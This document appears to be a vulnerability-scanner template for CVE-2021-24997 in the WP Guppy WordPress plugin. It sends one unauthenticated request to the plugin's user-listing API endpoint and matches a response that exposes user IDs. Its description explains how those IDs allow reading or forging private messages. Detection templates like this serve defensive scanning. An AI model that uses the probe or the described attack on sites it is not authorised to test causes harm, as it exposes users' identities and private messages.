35 lines
1.1 KiB
YAML
35 lines
1.1 KiB
YAML
id: CVE-2021-24997
|
|
|
|
info:
|
|
name: CVE-2021-24997
|
|
author: Evan Rubinstein
|
|
description: Instances of the Guppy Wordpress extension up to 1.1 are vulnerable to an API disclosure vulnerability which allows remote unauthenticated attackrs to obtain all user IDs, and then use that information
|
|
to make API requests to either get messages sent between users, or send messages posing as one user to another.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/50540
|
|
- https://patchstack.com/database/vulnerability/wp-guppy/wordpress-wp-guppy-plugin-1-2-sensitive-information-disclosure-vulnerability
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-24997
|
|
classification:
|
|
cvss-score: 5.4
|
|
cve-id: CVE-2021-24997
|
|
cwe-id: CWE-200
|
|
tags: wordpress,guppy,api,cve2021,cve,wp-plugin
|
|
|
|
requests:
|
|
- method:
|
|
path:
|
|
- "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"guppyUsers":'
|
|
- '"userId":'
|
|
- '"type":'
|
|
condition: and |